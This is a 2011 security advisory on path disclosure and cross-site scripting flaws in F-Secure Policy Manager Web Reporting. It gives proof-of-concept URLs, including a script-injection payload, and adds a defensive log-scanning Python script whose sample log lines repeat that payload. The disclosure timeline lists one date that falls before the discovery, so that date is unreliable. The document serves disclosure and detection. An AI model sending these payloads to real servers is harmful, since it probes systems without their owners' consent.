Description
F-Secure Policy Manager Web Reporting allows administrators to identify computers that are unprotected or vulnerable to virus outbreaks before they actually occur.
Sow Ching Shiong, an independent vulnerability researcher, has identified Path Disclosure and Cross-Site Scripting vulnerabilities in F-Secure Policy Manager Web Reporting. These issues were discovered in a default installation of F-Secure Policy Manager Web Reporting 9.00.30231. Other earlier versions may also be affected.
Proof of concept
Path Disclosure
============
http://[target]:8081/report/infection-table.html
Cross-Site Scripting (XSS)
====================
http://[target]:8081/'"--></style></script><script>alert(1)</script>
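For defenders reviewing logs from an instance that has not yet been patched, the following added example (not part of the original advisory and not F-Secure's code) flags requests whose path carries markup like the Cross-Site Scripting proof of concept above, in raw or percent-encoded form. It assumes access logs in Common Log Format, for instance from a proxy in front of port 8081; the sample lines, addresses and status codes are constructed.

```python
import re
from urllib.parse import unquote

# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup that should never appear in a request path: tag openers or a comment close
MARKUP = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*|-->", re.I)

def decode_path(target, rounds=3):
    """Percent-decode repeatedly so nested encodings (%253C) are also seen."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def suspicious_requests(log_lines):
    """Return (line_number, decoded_target) for requests whose path carries markup."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match is None:
            continue  # not a request line in the assumed format
        path = decode_path(match.group("target"))
        if MARKUP.search(path):
            hits.append((number, path))
    return hits

# Constructed sample lines (documentation addresses, invented timestamps and sizes)
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Feb/2011:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Feb/2011:10:00:05 +0000] '
    '"GET /\'"--></style></script><script>alert(1)</script> HTTP/1.1" 404 310',
    '198.51.100.7 - - [24/Feb/2011:10:00:09 +0000] '
    '"GET /%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 310',
    '192.0.2.10 - - [24/Feb/2011:10:00:12 +0000] "GET /css/style.css HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, path in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {path}")
```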
Solution
F-Secure recommends that administrators of the affected systems patch or upgrade their systems.
References
Vendor URL: http://www.f-secure.com/en/web/labs_global/fsc-2011-2
Secunia: http://secunia.com/advisories/43049/
Disclosure Timeline
2011-01-17 - Vulnerability discovered.
2011-01-17 - Vulnerability reported to Secunia.
2010-01-25 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-24 - Patch released.
2011-02-24 - Advisory published by Secunia.